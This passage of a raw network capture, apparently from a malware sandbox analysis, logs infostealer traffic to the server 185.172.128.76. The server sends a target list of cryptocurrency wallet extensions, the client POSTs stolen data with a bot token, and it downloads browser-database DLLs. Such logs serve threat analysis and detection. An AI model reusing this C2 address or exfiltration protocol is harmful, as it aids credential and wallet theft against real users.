64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62 Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhb
Apr 26, 2024 10:27:02.663002968 CEST	1289	IN	Data Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
Apr 26, 2024 10:27:02.663039923 CEST	1289	IN	Data Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
Apr 26, 2024 10:27:02.663100004 CEST	1289	IN	Data Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
Apr 26, 2024 10:27:02.663136005 CEST	456	IN	Data Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
Apr 26, 2024 10:27:02.691401958 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIJKEHCAKFCAKFHDAAA Host: 185.172.128.76 Content-Length: 6619 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:02.691479921 CEST	6619	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 Data Ascii: ------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Apr 26, 2024 10:27:03.079325914 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:03.370327950 CEST	93	OUT	GET /15f649199f40275b/sqlite3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 10:27:03.716614008 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:03 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
Apr 26, 2024 10:27:03.716726065 CEST	1289	IN	Data Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: @B/81s:<R@B/92P @B
Apr 26, 2024 10:27:03.716823101 CEST	1289	IN	Data Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 Data Ascii: +C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Apr 26, 2024 10:27:03.716862917 CEST	1289	IN	Data Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
Apr 26, 2024 10:27:03.716969967 CEST	1289	IN	Data Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75 Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
Apr 26, 2024 10:27:05.705037117 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAK Host: 185.172.128.76 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:06.079142094 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:06.221817017 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJKKKFIIJJKJKFIECBF Host: 185.172.128.76 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:06.597095013 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:06.612793922 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECG Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 2d 2d 0d 0a Data Ascii: ------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="file"------IECFIEGDBKJKFIDHIECG--
Apr 26, 2024 10:27:06.987848043 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:07.267398119 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file"------IJDHDGDAAAAKFIDGHJDG--
Apr 26, 2024 10:27:07.663551092 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:07.809633970 CEST	93	OUT	GET /15f649199f40275b/freebl3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 10:27:08.155966997 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:08 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Apr 26, 2024 10:27:09.228463888 CEST	93	OUT	GET /15f649199f40275b/mozglue.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 10:27:09.580432892 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:09 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 